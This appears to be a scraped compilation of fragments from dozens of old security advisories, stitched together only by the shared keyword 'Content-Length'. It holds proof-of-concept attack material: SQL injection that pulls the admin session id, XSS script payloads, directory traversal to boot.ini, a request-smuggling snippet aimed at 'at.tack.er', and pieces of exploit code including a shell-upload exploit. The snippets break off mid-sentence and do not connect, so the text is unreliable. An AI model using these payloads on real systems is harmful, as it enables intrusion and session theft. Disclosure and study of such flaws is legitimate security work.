
Content/Length

FortiGuard: URL Filtering Application Bypass Vulnerability

print "Waiting for connections on port 5050 TCP...\n";

while (my $browser = $server->accept()) { # When a connection occurs...
   binmode $browser;
   my $method="";
   my $content_length = 0;
   my $content = 0;
   my $accu_content_length = 0;
   my $host;
   my $hostAddr;
   my $httpVer;

PR07-37: XSS on Apache HTTP Server 413 error pages via malformed HTTP method

Description: 

It is possible to cause Apache HTTP Server to return client-supplied scripting code by submitting a malformed HTTP method that carries the payload (i.e. malicious JavaScript) together with invalid length data in any of the following forms:

 Two 'Content-Length:' headers each equal to zero, i.e. "Content-Length: 0[LF]Content-Length: 0"
 One 'Content-Length:' header carrying two values, i.e. "Content-Length: 0, 0"
 One 'Content-Length:' header with a negative value, i.e. "Content-Length: -1"
 One 'Content-Length:' header with a very large value, i.e. "Content-Length: 9999999999999999999999999999999999999999999999"



TWSL2012-008: Multiple Vulnerabilities in Scrutinizer NetFlow & sFlow Analyzer

HTTP/1.1 200 OK
Date: Thu, 17 Nov 2011 10:19:25 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 19

{"new_user_id":"9"}


Finding 2: SQL Injection

[DCA-2011-0006] Hiawatha 7.4 - Denial-of-Service

- 02/25/2011 -> Patch suggested by vendor.
- 03/04/2011 -> Advisory published.

[Bug Summary]

- Content-Length entity-header field miscalculation.

[Impact]

- Low


MSN messenger sends IP addresses Public and Private

Via: MSNSLP/1.0/TLP ;branch={D4CE435D-8C31-4D80-80EC-576A8294B3B3}
CSeq: 0
Call-ID: {00000000-0000-0000-0000-000000000000}
Max-Forwards: 0
Content-Type: application/x-msnmsgr-transudpswitch
Content-Length: 157

IPv4ExternalAddrsAndPorts: 79.2.165.233:3939
IPv4InternalAddrsAndPorts: 192.168.0.2:3939
SessionID: 729003413
SChannelState: 0

SFCB vulnerabilities

and is used in many Linux distributions and some VMware / Dell products.

[=] Vulnerabilities

* CVE-2010-1937 (SFCB bug #3001896) : pre-auth remote heap overflow
using a forged Content-Length header

When parsing a HTTP request, SFCB will use any positive Content-Length
value to allocate a buffer. Then, memcpy tries to copy the user-provided
POST data in this buffer. By sending a small value in the Content-Length
header and more data in the POST body, it's possible to overflow the

eyeOS checksum prediction

Accept-Charset: windows-1251,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded;
Referer: http://demo.eyeos.org/
Content-Length: 117
Cookie: PHPSESSID=ad92920e4ab606df75b28702255a87c8
Pragma: no-cache
Cache-Control: no-cache

params=%3CeyeLogin_Username%3Edemo23%3C%2FeyeLogin_Username%3E%3CeyeLogin_Password%3Edemo23%3C%2FeyeLogin_Password%3E

WikkaWiki <= 1.3.2 Multiple Security Vulnerabilities

  This is a proof of concept request:
  
   POST /wikka/UserSettings HTTP/1.1
   Host: localhost
   Cookie: 96522b217a86eca82f6d72ef88c4c7f4=c3u94bo2csludij3v18787i4p6
   Content-Length: 140
   Content-Type: application/x-www-form-urlencoded
   Connection: keep-alive

   action=update&email=test%40test.com&default_comment_display=',email=(SELECT sessionid FROM wikka_sessions WHERE userid='WikiAdmin'),theme='


XOOPS 2.5.0 <= Cross Site Scripting Vulnerability

Connection: close
Referer: http://attacker.in/xoops/modules/system/admin.php?fct=modulesadmin
Cookie: PHPSESSID=b11e32946cf66e9a6391ccbad34453af;
xoops_user=1-549115432fcb56150b18bef08004f77d;
Content-Type: application/x-www-form-urlencoded
Content-Length: 100

op=confirm&module%5b%5d=1"><script>alert(1)</script>&submit=Submit&oldname%5b1%5d=System&fct=modulesadmin&newname%5b1%5d=System
[/REQUEST]



Re: Re: Re: Re: Re: Apache Server HTML Injection and UTF-7 XSS Vulnerability

====================================================================

HTTP/1.1 403 Forbidden
Date: Sun, 18 May 2008 02:25:31 GMT
Server: Apache/2.2.3 (CentOS)
Content-Length: 590
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>

Related POC for JCE Joomla Extension <=2.0.10 Multiple Vulnerabilities

__utma=216871948.2116932307.1317632284.1317632284.1317632284.1;  
__utmb=216871948.1.10.1317632284; __utmc=216871948;  
__utmz=216871948.1317632284.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)\r\n";
                        $packet .= "Connection: Close\r\n";
                        $packet .= "Proxy-Connection: close\r\n";
                        $packet .= "Content-Length: ".strlen($data)."\r\n\r\n\r\n\r\n";
                        $packet .= $data;

                        sendpacket($packet,0,0,0);

                                                                                /* Packet 3 --> Change Extension from .gif to .php */

OpenNMS Multiple Vulnerabilities

HTTP/1.1 302 Moved Temporarily
Date: Thu, 25 Sep 2008 11:30:05 GMT
Server: Apache/2.2.3
Location: http://server/opennms/event/list?
InjectedHeader: BugSec=
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8


HTTP Response Splitting

Jetty 6.x and 7.x Multiple Vulnerabilities

    (Affected versions: Any)

 E) "Cookie Dump Servlet" escape sequence injection
    (Affected versions: Any)

 F) Http Content-Length header escape sequence injection
    (Affected versions: Any)

 G) "Cookie Dump Servlet" stored XSS
    (Affected versions: =<6.1.20)


TWSL2012-002: Multiple Vulnerabilities in WordPress

Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Proxy-Connection: keep-alive
Referer: http://A.B.C.D/wp-admin/setup-config.php?step=1
Cookie: wp-settings-time-1=1322687480; wp-settings-1=m9%3Do
Content-Type: application/x-www-form-urlencoded
Content-Length: 81

dbname=wordpress&uname=jsmith&pwd=jsmith&dbhost=W.X.Y.Z&prefix=wp_&submit=Submit

Request #2
----------

Vulnerabilities in 3S CoDeSys 3.4 SP4 Patch 2

              http://www.3s-software.com/index.shtml?en_CoDeSysV3_en
Versions:     <= 3.4 SP4 Patch 2
Platforms:    Windows
Bugs:         A] GatewayService integer overflow
              B] CmpWebServer stack overflow
              C] CmpWebServer Content-Length NULL pointer
              D] CmpWebServer invalid HTTP request NULL pointer
              E] CmpWebServer folders creation
Exploitation: remote
Date:         29 Nov 2011
Author:       Luigi Auriemma

TWSL2011-019: Cross-Site Scripting Vulnerability in phpMyAdmin

Set-Cookie: pma_lang=en; expires=Sat, 31-Dec-2011 16:42:17 GMT; path=/phpmyadmin/setup/; httponly
X-Frame-Options: SAMEORIGIN
X-Content-Security-Policy: allow 'self'; options inline-script eval-script; frame-ancestors 'self'; img-src 'self' data:; script-src 'self' www.phpmyadmin.net
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 7722
Content-Type: text/html; charset=utf-8

---snip---

<input type="hidden" name="token" value="5acce3a965bbe9d42ce50bdf3d491ed9" />

Positron Security Advisory #2009-000: Multiple Vulnerabilities in MapServer v5.2.1 and v4.10.3

B.  Heap-based Buffer Underflow (CVE-2009-0840)
    Severity: Medium

    By providing a specially-crafted POST request to the "mapserv" CGI
application, an out-of-bounds memory write can be triggered.
Specifically, by setting the "CONTENT_LENGTH" environment variable to
- -1, the code will write a zero byte to "data[ -1 ]", where "data" is a
character array allocated on the heap via malloc(3).

When the following is executed locally on the command line:


[MSA01240108] IE7 Transfer-Encoding: chunked allows Request Splitting/Smuggling.

    if (x.readyState == 4){
    }
 }
try{
x.send("0\r\n\r\nPOST / HTTP/1.1\r\nHost:
at.tack.er\r\nContent-Length: SOMELENGTH\r\n\r\n")  }catch(r){} }
-----------------------------------------------------

the request will become:
----------------------------------------------------
POST / HTTP/1.1

[SECURITY] [DSA 1914-1] New mapserver packages fix several vulnerabilities

  this to execute arbitrary code on the server via crafted id parameters.

CVE-2009-0840

  An integer overflow leading to a heap-based buffer overflow when
  processing the Content-Length header of an HTTP request can be used by an
  attacker to execute arbitrary code via crafted POST requests containing
  negative Content-Length values.

CVE-2009-2281


GCALDaemon Remote DoS

*** SUMMARY ***

GCALDaemon is an OS-independent Java program that offers two-way synchronization between Google Calendar and various iCalendar compatible calendar applications. GCALDaemon is primarily designed as a calendar synchronizer but it can also be used as a Gmail notifier, Address Book importer, Gmail terminal and RSS feed converter.

Sunbird/Kontact/Firefox/ThunderBird/Mozilla Calendar all share calendars over HTTP, uploading their file via an HTTP PUT and getting/refreshing their calendar with an HTTP GET. GCALDaemon's built-in HTTP server keeps these HTTP messages in sync with a specified Google Calendar. An input validation flaw permits crafting an HTTP request with an abnormal Content-Length value; this malformed request can trigger a denial of service arising from a Java out-of-memory fatal error.

*** VULNERABILITY DETAILS ***

Using a crafted HTTP request, an attacker could trigger a denial of service arising from a java.lang.OutOfMemoryError when the Java heap space is exhausted.
In the file "org/gcaldaemon/core/http/HTTPListener.java", GCALDaemon's built-in HTTP server parses the HTTP request and the HTTP header parameters without any validation checkpoints.

[DCA-2011-0009] Weborf 0.12.4 Denial-of-Service

- 01/28/2011 -> Vendor response. (Acknowledged and fixed the bug)
- 03/04/2011 -> Advisory published.

[Bug Summary]

- Wrong parsing in Content-Length entity-header.

[Impact]

- Low


CubeCart 4 Session Management Bypass

boundary=----WebKitFormBoundaryCpv+NVAHAgHHdvdI
User-Agent:
X_CLUSTER_CLIENT_IP:
Cookie: ccAdmin=+
Accept: */*;q=0.5
Content-Length: 434

------WebKitFormBoundaryCpv+NVAHAgHHdvdI
Content-Disposition: form-data; name="structure"

1

Remote Command Execution in dotDefender Site Management

  Connection: keep-alive
  Referer: https://172.16.159.132/dotDefender/index.cgi
  Authorization: Basic YWRtaW46
  Cache-Control: max-age=0
  Content-Type: application/x-www-form-urlencoded
  Content-Length: 76

  sitename=dotdefeater&deletesitename=dotdefeater&action=deletesite&linenum=14

An attack looks like:


Re: [Full-disclosure] Remote Command Execution in dotDefender Site Management

>   Connection: keep-alive
>   Referer: https://172.16.159.132/dotDefender/index.cgi
>   Authorization: Basic YWRtaW46
>   Cache-Control: max-age=0
>   Content-Type: application/x-www-form-urlencoded
>   Content-Length: 76
> 
>   sitename=dotdefeater&deletesitename=dotdefeater&action=deletesite&linenum=14
> 
> An attack looks like:
> 

[CVE-2009-1479] Boxalino - Directory Traversal Vulnerability

Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: curl/7.15.5 (i686-redhat-linux-gnu) libcurl/7.15.5
OpenSSL/0.9.8b zlib/1.2.3 libidn/0.6.5
Host: www.example.ch
Content-Length: 256
Cookie: JSESSIONID=A57AABD5F2051C4333F500EBB1232295
Connection: Close
Pragma: no-cache

url=../../../../../../../../boot.ini&login_loginName=example&login_loginPassword=example&login_cmd_logon=Login&defaultAction=Example&login_cmd_logon_resultPage=%2Fboxalino%2Fclient%2Fdesktop%2Fdefault%2Ehtm

Family Connections <= 1.8.2 - Remote Shell Upload Exploit

        }
        
        sprintf(buffer, "POST %sindex.php HTTP/1.1\r\n"
                                        "Host: %s\r\n"
                                        "Content-Type: application/x-www-form-urlencoded\r\n"
                                        "Content-Length: %d\r\n\r\nuser=%s&pass=%s&submit=Login",
argv[2], argv[1], (strlen(argv[4])+strlen(argv[3])+24), argv[3],
argv[4]);
        
                                        
        printf("\n[*] Connecting...");

TWSL2012-001: Cross-Site Scripting Vulnerability in Textpattern Content Management System

Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Proxy-Connection: keep-alive
Referer: http://A.B.C.D/textpattern/setup/index.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 156

duser=blah&dpass=&dhost=localhost&ddb=%3Cscript%3Ealert%28%27123%27%29%3C%2
Fscript%3E&dprefix=&siteurl=A.B.C.D&Submit=next&lang=en-us&step=print
Config


F*EX <= 20100208 Cross Site Scripting Vulnerabilities

Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://192.168.1.3:8888/fup
Content-Type: multipart/form-data; boundary=--------1922591683
Content-Length: 233

----------1922591683
Content-Disposition: form-data; name="id"



NULL byte writing in Emerald, RadiusNT/X and Air Marshal

For each HTTP POST request the configuration web server starts receiving
the client's data into a heap buffer which automatically grows through
realloc.
When the amount of data received is larger than the integer value specified
in Content-Length it stops the operation and places a NULL byte at the end
of the data to delimit it.

The problem is that using a negative Content-Length value forces the
server to place this 0x00 byte in a location of the memory which goes
from heap_buffer+http_header+0x80000000 to

[ADVISORY] NetCache URL DoS - Argentinian ISP

// Lets check our target IP is handled by a NetCache:
$ printf "TRACE / HTTP/1.1\r\nHost: 74.125.65.106\r\nMax-Forwards:
0\r\nConnection: Close\r\n\r\n" | nc 74.125.65.106 80
HTTP/1.1 200 OK
Date: Mon, 17 Aug 2009 00:35:16 GMT
Content-Length: 97
Content-Type: message/http
Server: NetCache appliance (NetApp/6.0.7)
Connection: close

TRACE http://74.125.65.106/ HTTP/1.1
